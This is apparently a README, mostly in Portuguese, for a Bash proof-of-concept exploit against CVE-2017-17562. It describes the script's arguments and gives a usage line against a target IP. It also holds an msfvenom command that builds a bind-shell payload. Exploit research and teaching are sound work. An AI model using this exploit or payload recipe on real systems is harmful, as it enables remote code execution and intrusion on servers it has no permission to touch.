
PoC para CVE-2017-17562 escrita em bash
Uma implementação PoC em Bash para CVE-2017-17562.
Requer curl para criar requisições HTTP.
Baseado nas implementações do Metasploit e de @fssecur3.
Os seguintes argumentos precisam ser definidos, pois são necessários para reconhecimento e envio do payload:
$1: IP/Host of remote vulnerable machine being attacked
$2: Port of remote machine webserver
$4: Path to crafted payload being sent to vulnerable machine
Opcionalmente, os seguintes argumentos também podem ser definidos:
$3: If the web server is running under a TLS/SSL tunnel. Defaults to no
$5: Path to list of known vulnerable CGI endpoints, to be used in reconnaissance phase. Defaults to "cgi.endpoints"
bash exploit.bash 192.168.1.1 80 yes payload.so cgi.endpoints
O presente código é apenas para fins de aprendizado e demonstração. Você não deve usá-lo em alvos para os quais não tenha permissão.
Nenhum payload é fornecido neste repositório. No entanto, qualquer binário que corresponda à arquitetura do SO alvo deve funcionar. Para criar um payload de bind shell, você pode usar msfvenon:
msfvenom -a <instruction_set> --platform <os> -p generic/shell_bind_tcp LHOST=<attacker_ip_address> LPORT=<target_bind_port> -f elf-so -o payload.so